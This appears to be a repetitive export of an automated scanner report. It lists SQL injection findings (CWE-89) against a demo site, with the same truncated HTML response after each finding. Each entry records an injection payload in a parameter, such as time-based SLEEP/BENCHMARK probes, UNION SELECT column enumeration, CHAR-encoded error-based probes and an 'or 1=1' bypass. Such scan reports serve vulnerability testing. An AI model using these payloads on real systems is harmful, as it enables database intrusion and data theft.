window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1497\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1498\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1499\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AS INJECTX WHERE 1=1 AND 1\n=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1500\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AS INJECTX WHERE 1=1 AND 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1501\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1502\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1503\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1504\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1505\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1506\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1507\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1508\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# ORDER BY 6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1509\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1510\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> 